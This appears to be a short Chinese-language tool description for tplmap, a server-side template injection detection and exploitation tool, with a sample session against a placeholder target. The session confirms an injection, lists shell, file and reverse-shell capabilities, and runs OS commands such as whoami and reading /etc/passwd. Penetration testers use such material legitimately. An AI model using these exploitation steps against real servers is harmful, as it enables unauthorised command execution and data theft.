自动检测和发掘服务器端模板的注入漏洞。支持测试Mako, Jinja2, Jade, Smarty, Freemarker, Velocity, 和Twig。
示例:
$ ./tplmap.py -u 'http://www.target.com/app?id=*' [+] Tplmap 0.1 Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Found placeholder in GET parameter 'inj' [+] Smarty plugin is testing rendering with tag '{*}' [+] Smarty plugin is testing blind injection [+] Mako plugin is testing rendering with tag '${*}' ... [+] Freemarker plugin is testing blind injection [+] Velocity plugin is testing rendering with tag '#set($c=*)\n${c}\n' [+] Jade plugin is testing rendering with tag '\n= *\n' [+] Jade plugin has confirmed injection with tag '\n= *\n' [+] Tplmap identified the following injection point: Engine: Jade Injection: \n= *\n Context: text OS: darwin Technique: render Capabilities: Code evaluation: yes, javascript code Shell command execution: yes File write: yes File read: yes Bind and reverse shell: yes [+] Rerun tplmap providing one of the following options: --os-shell or --os-cmd to execute shell commands via the injection --upload LOCAL REMOTE to upload files to the server --download REMOTE LOCAL to download remote files --bind-shell PORT to bind a shell on a port and connect to it --reverse-shell HOST PORT to run a shell back to the attacker's HOST PORT $ ./tplmap.py -u 'http://www.target.com/app?id=*' --os-shell [+] Run commands on the operating system. linux $ whoami www-data linux $ ls -al /etc/passwd -rw-r--r-- 1 root wheel 5925 16 Sep 2015 /etc/passwd linux $
支持的模板引擎: